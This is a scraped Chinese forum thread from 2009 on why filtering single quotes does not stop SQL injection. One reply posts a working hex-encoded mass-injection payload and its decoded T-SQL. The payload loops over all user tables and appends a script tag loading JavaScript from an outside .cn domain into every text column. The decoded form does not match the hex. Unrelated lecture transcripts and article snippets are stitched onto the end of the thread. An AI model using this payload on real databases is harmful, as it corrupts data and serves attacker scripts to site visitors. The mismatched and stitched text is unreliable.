关于sql注入,都说只过渡单引号是没用的,可我一直搞不明白,我过渡了单引号,你还怎么注入?

thanksfriend 2009-12-04 11:01:10

关于sql注入,都说只过渡单引号是没用的,可我一直搞不明白,我过渡了单引号,你还怎么注入?

16进制?能举个例子吗?

...全文

285 8 打赏收藏转发到动态举报

写回复

8 条回复

切换为时间正序

请发表友善的回复…

发表回复

stevenloveyou 2009-12-04

打赏
举报

回复

学习

winner2050 2009-12-04

打赏
举报

回复

16进制的威力很大

dEcLaRe%20@s%20vArChAr(8000)%20sEt%20@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72%20eXeC(@s);--

翻译过来

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://cn.daxia123.cn/cn.js></script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C END
CLOSE Table_Cursor DEALLOCATE Table_Cursor

执行一遍，保证你老板打爆你头。

注册失败 2009-12-04

打赏
举报

回复

看CSDN之前关于这个问题的火热讨论：
http://topic.csdn.net/u/20091013/10/bae1ff33-24bb-4369-9dc6-d2f8faa4cb17.html
http://topic.csdn.net/u/20091015/15/e01678ef-9e35-43f8-a434-7249368d7d1d.html
两个帖子都仔细阅读下

zzxap 2009-12-04

打赏
举报

回复

一个-就能省略掉后面的过滤单引号的SQL

mytimes_walker 2009-12-04

打赏
举报

回复

别拼接SQL，设置SQL参数。

自然框架 2009-12-04

打赏
举报

回复

4楼的那个根本就是注入不进来的。

只需要判断id是不是数字，就可以把他拒之门外。

防止SQL注入：
1、判断数据类型，适用于数字型、日期型。
2、过滤单引号，适用于字符串。

balenoww 2009-12-04

打赏
举报

回复

mark

七娃Ooo 2009-12-04

打赏
举报

回复

DECLARE 百分号 exec 这些过滤了才是王道

SQL注入魔鬼五步走 2007-06-24 22:55:32| 分类：思绪燃星火——技 | 标签：技术随笔黑客注入攻击 [注：转载时清保留版权信息！] {前言：谁都有犯傻的时候，看我05年时辛辛苦苦写的文章，简直是小竹《SQL注入天书》的翻版！！一直没脸拿出来，后来想想不能白写不是？所以免费发出来了，没办法……} 作者：A1Pass http://a1pass.blog.163...

今天呢本来是在前面两天就上的啊，那个孙斌呢就等今天再伤了啊，我们看今天内容啊，上节课呢我们讲了这个pp的四个组的常规查询，压这个跨物注入啊是吧，文件读写的啊，这上节课我们讲的哈。然后呢这个pp的课程呢还有几章，好好多了哈啊今天我们在讲他的这个注入，其实我们把这个pp加MYSQL租这个东西学好之后呢，像后面其他数据库的一些各种组类呢，就只要学一下它的特点就可以了啊。

mysql使用与事务

就行了好了呃。禁止闲聊，我们接着往下看好吧，刚说完spring。我们今天主要讲什么，讲spring boat这样的东西，我还是那句话，我希望你们去看官网啊。逗号里面透露出来很多的一些相关信息，都是我们值得思考的，比如说很多人一直问我说，老师spring boot算不算是微服务，啊听到有问题啊，我说spring boot算不算被服务，就算同学扣一。

长时间了。下面我们正式进入到spring boot的一个学习，怎么学啊，很多同学又懵了，老师一涉及到知识点学就慌了，如果后面再出来一个spring po。我要怎么学习啊，非常简单，官网我一直在强调这件事的重要性，包括之前讲讲课的时候，MYSQL也是一样，我是不是带你看官网，你们要看好吧，叫spring boot，我们现在讲课用什么用，最新版本是2。2。2好，2。2。

62,254

社区成员

668,981

社区内容

发帖

与我相关

我的任务

javascript云原生企业社区

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见，支持健康理性的辩论和互动，反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧

+ 用AI写文章